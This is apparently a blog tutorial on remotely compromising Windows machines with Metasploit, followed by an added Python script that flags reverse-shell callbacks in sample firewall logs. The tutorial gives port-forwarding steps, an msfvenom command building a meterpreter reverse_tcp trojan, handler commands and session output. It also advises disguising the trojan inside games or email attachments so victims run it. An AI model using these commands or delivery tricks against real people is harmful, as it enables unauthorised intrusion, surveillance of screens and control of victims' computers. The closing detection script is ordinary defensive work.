How to hack windows using kali linux remotely with metasploit – 2017
Router Configuration
This step is very important when your target is over the internet or WAN. Ignore this step if your target is on the same LAN. To hack a PC over the internet you have to communicate in both directions, so your router/modem must open a port to your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser and go to the URL http://192.168.1.1. Type in your username and password (by default both username and password will be "admin"). This will take you to the router settings. Go to Advanced settings and find port forwarding. Click on "add new" and set the start and end port to 444 (since we are using port 444 in Metasploit). In the IP address field you must type in your Linux machine's internal IP. Save the settings and you are done. You can double-check by scanning your port with an online port scanner.
Generate the Trojan
Generate the payload using msfvenom. Set the port to 444 and the IP to your public IP or local IP depending on where your target is. The generated trojan will try to connect to this IP and port when it is executed. The following command will generate the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST="attacker ip" LPORT=444 -o /root/Desktop/trojan.exe
A trojan will be generated on the desktop. Keep it aside and move on to the handler section. Fire up Metasploit and follow the steps.
# msfconsole
Wait a minute for msfconsole to come up. Then use the handler and set the payload, port and host.
1. Handler
msf> use multi/handler
2. Set payload
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
3. Set local port
msf exploit(handler) > set LPORT 444
4. Set local host
msf exploit(handler) > set LHOST "attacker ip"
5. Exploit
msf exploit(handler) > exploit
Wait for the target to connect back:
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler...
Execute the payload
Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea; better encode it and attach it to a normal application or a game, or even an email. Once our trojan is in and executed, a meterpreter session will be spawned:
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler...
[*] Sending stage (83170 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter >
A Meterpreter session allows you to execute system commands, run networking commands, view the target's screen and much more. Use the help command to see the whole list of commands.
meterpreter > help
Use this command to start a VNC session and watch the target's screen:
meterpreter > run vnc
This whole process is simple, but the toughest part is getting the trojan onto the target user's machine. Attaching the file along with games works great.
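From the defender's side, the observable in this whole procedure is the callback itself: a workstation opening an outbound TCP connection to an unusual port (444 here) and, as the handler output above shows, doing so again if the session is restarted. The following is an added example and not part of the original post; it runs a simple reverse-shell-callback check over constructed firewall log lines (the log format, the allowed-port lists and the 192.168.0.0/16 internal range are assumptions for the example).

```python
import ipaddress
import re
from collections import Counter

# Constructed sample firewall log lines (not taken from the original post).
SAMPLE_LOG = """\
2016-05-20T03:20:40 ALLOW TCP 192.168.1.105:49210 -> 93.184.216.34:443
2016-05-20T03:20:41 ALLOW TCP 192.168.1.105:49211 -> 192.168.1.20:445
2016-05-20T03:20:44 ALLOW TCP 192.168.1.105:36028 -> 192.168.1.104:444
2016-05-20T03:20:45 ALLOW TCP 192.168.1.105:36029 -> 203.0.113.7:444
2016-05-20T03:20:46 ALLOW TCP 192.168.1.105:49215 -> 8.8.8.8:53
2016-05-20T03:21:10 ALLOW TCP 192.168.1.105:36030 -> 203.0.113.7:444
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+ALLOW\s+TCP\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Assumed baseline: ports a workstation normally talks to; anything else is reviewed.
EXPECTED_PORTS = {53, 80, 443}
# Assumed LAN services workstations legitimately reach (e.g. SMB file shares).
LAN_PORTS = {445}
INTERNAL = ipaddress.ip_network("192.168.0.0/16")

def find_callback_candidates(log_text):
    """Return (timestamp, src, dst, dport, reason) for connections that look like
    reverse-shell callbacks: a host connecting out to a non-standard port."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        dst = ipaddress.ip_address(m["dst"])
        dport = int(m["dport"])
        if dport in EXPECTED_PORTS:
            continue
        internal_dst = dst in INTERNAL
        if internal_dst and dport in LAN_PORTS:
            continue
        reason = "host-to-host on unusual port" if internal_dst else "egress on unusual port"
        hits.append((m["ts"], m["src"], str(dst), dport, reason))
    return hits

def repeated_destinations(hits, threshold=2):
    """Same (src, dst, port) seen repeatedly points at a reconnecting callback."""
    counts = Counter((src, dst, dport) for _, src, dst, dport, _ in hits)
    return {key: n for key, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    hits = find_callback_candidates(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(repeated_destinations(hits))
```

The port allowlist is deliberately small so the example flags the port-444 callbacks; in practice it would be derived from the baseline of the monitored network.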